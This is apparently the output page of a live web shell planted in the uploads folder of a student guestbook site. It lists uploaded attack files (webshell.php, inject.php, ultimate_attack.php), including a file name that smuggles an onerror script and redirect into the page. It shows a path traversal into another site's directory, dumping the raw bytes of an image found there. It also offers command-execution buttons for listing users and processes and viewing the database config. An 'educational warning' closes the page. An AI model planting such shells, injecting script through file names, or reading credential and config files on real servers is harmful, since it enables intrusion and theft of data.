🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../586004.klas4s23.mid-ica.nl/public_html/../public_html/images/loc.png

�PNG


IHDR/9��r*tEXtSoftwareAdobe ImageReadyq�e<(iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Macintosh)" xmpMM:InstanceID="xmp.iid:22EC3BFDBEFD11E7B91BE2544EF78DBB" xmpMM:DocumentID="xmp.did:22EC3BFEBEFD11E7B91BE2544EF78DBB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:22EC3BFBBEFD11E7B91BE2544EF78DBB" stRef:documentID="xmp.did:22EC3BFCBEFD11E7B91BE2544EF78DBB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>z�ڌIDATx�Ԛ]HQ��}QX�%Q>HE��=E�~�	Q�D���dB)�K�F�Q$���҇	�}����AAR�b����ٝ�3wg�β{��߹s��sﬡ4؞��pP1T��r���h�������wT7���5\o�C��f�%^B������'�^��к���"��Y�t>\t�Q�m�Lm �	m�/���Pٷo�p׮`(�F�.����U֢�=�Ep�#�?��]���qA��~�+S��*~��
 �2R<�]�<�/h_�ClXL�4�.W�3��6�����=�|j�r���*��ڹ�tj��y^9_�X�nA�,om��B�T-\�6%VbsϷ�i<�t�8���T��:����d=�8�DŽ�]�VJ�=�)8߅7�6�J���0�D�^�7c�F��sun�i3�E�>�wXu]�w@��8�K�U⭛Ği��\�8���&4�K�UD�X�%{�/����'��K�K�
�h��\k1�6X�^r��?.m��,W�9�P?N�C�vrv��b|-�6D�=.���Jd\�ZX���{�i�J�:��6��7�_�;��{�I�5���j�3��t�?aZJ����q��~��
|�]��#yU��E�`���u��ޗ��C�������BI{��W���>���40�Q�Ri��Sj�Tv6 ��Q�^��������~�ҝ�mz�3�#���W���>���\�^���@�3x�H�S�S{5�m�9����(w�+����w�#��oˤ��W7���g��'�r^�x%�Chc���]�Y;�A�x
]��=���������A8]��)���\�^yN�����R�w�`��t�5��U|P���E1x��^�8=}��a��|����9��P�:��|���J�����˫@�s���LQ����rZ�P�
�n5���e���CVcܗ��P�'�"����P+p����cNU�
�o�QD���IEND�B`�

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!